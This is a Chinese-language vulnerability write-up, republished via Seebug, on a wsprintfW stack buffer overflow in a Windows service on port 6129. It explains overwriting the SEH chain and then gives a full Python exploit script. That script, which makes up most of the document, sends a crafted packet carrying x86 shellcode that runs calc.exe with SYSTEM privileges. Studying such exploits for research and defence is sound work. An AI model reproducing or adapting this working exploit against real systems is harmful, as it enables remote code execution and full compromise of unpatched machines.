Author:SaFeBuG@i春秋

漏洞相關鏈接:http://www.freebuf.com/articles/terminal/102204.html

幾個重要參數分布圖:

D380處為input_buf,即是所發的shellcode包,大小為0x430 F920處為dst_buf,大小0x208 FB28處為format_str,大小為0x92

關鍵函數wsprintfW最大拷貝值為:0x400。由于該函數為unicode型,故每次拷貝兩個字節,循環拷貝0x400次,故總共拷貝0x800 byte。從F920處開始,向下拷貝0x800個字節,導致棧空間全部被覆蓋,觸發了page fault異常。于是我們可以借此漏洞刻意覆蓋SEH首鏈地址,用pop pop retn 覆蓋第一個異常處理函數地址,用eb 06 90 90 覆蓋第一個異常處理鏈表地址,接著就是用我們的布置好的call xxxx 覆蓋后面部分。

如下圖:

該漏洞只能在本地測試,遠程測試的話,需要使用IPv6的ip地址才能成功。

IDA代碼段如下;

該函數必須返回非零,下一步才能到達漏洞點。

測試環境:

Windows 7 x86 給出本地測試EXP代碼: local_exp.py

import socket
import sys
import os
import time
import struct
import binascii
import random
??
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
??
MsgBox = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
??
#pading = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#pading = "A"*(0x20b+0x9) + sc
attack = "\x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox)) + "B"*(0x162) + "\xeb\x06\x90\x90"? + "\x6d\x14\x40\x00" + "\xe8\x37\xd4\xfe\xff" + "D"*(0xb6-0x4-0x5)
port = 6129
??
#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'
csock = socket.socket( socket.AF_INET6, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
??
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"#csock.send(buf)
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
??
??
buf = struct.pack("I", 0x9c44) #msg type
#buf += pading #payload
buf += attack
#buf += ("%" + "\x00" + "c" + "\x00")
csock.send(buf)
??
??
print binascii.hexlify(csock.recv(0x4000))
??
csock.close()

SYSTEM級別的calc。

原文地址:http://bbs.ichunqiu.com/thread-13555-1-1.html?from=seebug

Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/82/